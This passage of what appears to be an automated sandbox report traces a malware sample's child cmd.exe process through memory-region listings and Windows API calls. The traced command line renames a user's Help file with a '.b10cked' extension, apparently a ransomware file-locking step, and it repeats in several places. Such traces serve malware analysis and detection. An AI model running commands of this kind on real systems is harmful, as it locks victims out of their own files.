"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28824 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28825 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28826 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28827 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28828 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28829 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28830 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28831 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28832 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28833 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28834 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 28835 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28836 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 642 os_tid = 0xc00 Process: id = "451" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xc30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28854 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28855 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28856 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28857 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28858 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28859 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28860 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28861 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28862 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28863 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28879 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28880 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28881 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28882 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 28883 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 28884 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28885 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28886 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28887 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28888 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28889 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28890 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28891 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28892 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28893 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 28894 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28895 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28896 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28897 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 28898 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 28899 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 28900 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 28901 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 28902 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 28927 start_va = 0x2e0000 end_va = 0x39ffff entry_point = 0x2e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 644 os_tid = 0xbfc [0195.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf9bc | out: lpSystemTimeAsFileTime=0x1cf9bc*(dwLowDateTime=0xa99916a0, dwHighDateTime=0x1d440a9)) [0195.924] GetCurrentProcessId () returned 0xc30 [0195.924] GetCurrentThreadId () returned 0xbfc [0195.924] GetTickCount () returned 0x378b7 [0195.924] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf9b4 | out: lpPerformanceCount=0x1cf9b4*=25271328198) returned 1 [0195.925] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0195.925] __set_app_type (_Type=0x1) [0195.925] __p__fmode () returned 0x76b331f4 [0195.925] __p__commode () returned 0x76b331fc [0195.925] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0195.925] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0195.925] GetCurrentThreadId () returned 0xbfc [0195.925] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbfc) returned 0x38 [0195.925] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0195.926] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0195.926] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.926] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0195.926] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf94c | out: phkResult=0x1cf94c*=0x0) returned 0x2 [0195.926] VirtualQuery (in: lpAddress=0x1cf983, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0195.926] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0195.926] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0195.926] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0195.926] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0195.926] GetConsoleOutputCP () returned 0x1b5 [0195.926] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0195.926] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0195.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.926] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0195.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.927] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0195.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.927] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.927] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0195.927] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.927] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0195.927] GetEnvironmentStringsW () returned 0x3d0178* [0195.927] FreeEnvironmentStringsW (penv=0x3d0178) returned 1 [0195.928] GetEnvironmentStringsW () returned 0x3d0178* [0195.928] FreeEnvironmentStringsW (penv=0x3d0178) returned 1 [0195.928] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8bc | out: phkResult=0x1ce8bc*=0x40) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0xa0, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x1, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x1, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x0, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x40, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x40, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x40, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegCloseKey (hKey=0x40) returned 0x0 [0195.928] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8bc | out: phkResult=0x1ce8bc*=0x40) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x40, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x1, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x1, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x0, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x9, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x9, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x9, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegCloseKey (hKey=0x40) returned 0x0 [0195.928] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639d [0195.928] srand (_Seed=0x5b88639d) [0195.928] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"" [0195.929] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"" [0195.929] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.929] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0195.929] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.929] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.929] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0195.929] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0195.929] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0195.929] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0195.929] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0195.929] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0195.929] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0195.929] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0195.929] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0195.929] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0195.929] GetEnvironmentStringsW () returned 0x3d22c8* [0195.930] FreeEnvironmentStringsW (penv=0x3d22c8) returned 1 [0195.930] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.930] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0195.930] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0195.930] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0195.930] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0195.930] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0195.930] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0195.930] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0195.930] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0195.930] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0195.930] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf688 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.930] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf688, lpFilePart=0x1cf684 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf684*="Desktop") returned 0x18 [0195.930] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0195.930] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf404 | out: lpFindFileData=0x1cf404) returned 0x3d0008 [0195.930] FindClose (in: hFindFile=0x3d0008 | out: hFindFile=0x3d0008) returned 1 [0195.930] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf404 | out: lpFindFileData=0x1cf404) returned 0x3d0008 [0195.930] FindClose (in: hFindFile=0x3d0008 | out: hFindFile=0x3d0008) returned 1 [0195.930] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf404 | out: lpFindFileData=0x1cf404) returned 0x3d0008 [0195.930] FindClose (in: hFindFile=0x3d0008 | out: hFindFile=0x3d0008) returned 1 [0195.931] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0195.931] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0195.931] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0195.931] GetEnvironmentStringsW () returned 0x3d2ae8* [0195.931] FreeEnvironmentStringsW (penv=0x3d2ae8) returned 1 [0195.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.931] GetConsoleOutputCP () returned 0x1b5 [0195.931] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0195.931] GetUserDefaultLCID () returned 0x409 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf7c8, cchData=128 | out: lpLCData="0") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf7c8, cchData=128 | out: lpLCData="0") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf7c8, cchData=128 | out: lpLCData="1") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0195.932] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0195.933] GetConsoleTitleW (in: lpConsoleTitle=0x3c08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.934] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0195.934] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0195.934] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0195.934] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0195.935] _wcsicmp (_String1="move", _String2=")") returned 68 [0195.935] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0195.935] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0195.935] _wcsicmp (_String1="IF", _String2="move") returned -4 [0195.935] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0195.935] _wcsicmp (_String1="REM", _String2="move") returned 5 [0195.935] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0195.938] GetConsoleTitleW (in: lpConsoleTitle=0x1cf4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.938] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0195.938] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0195.938] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0195.938] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0195.938] _wcsicmp (_String1="move", _String2="COPY") returned 10 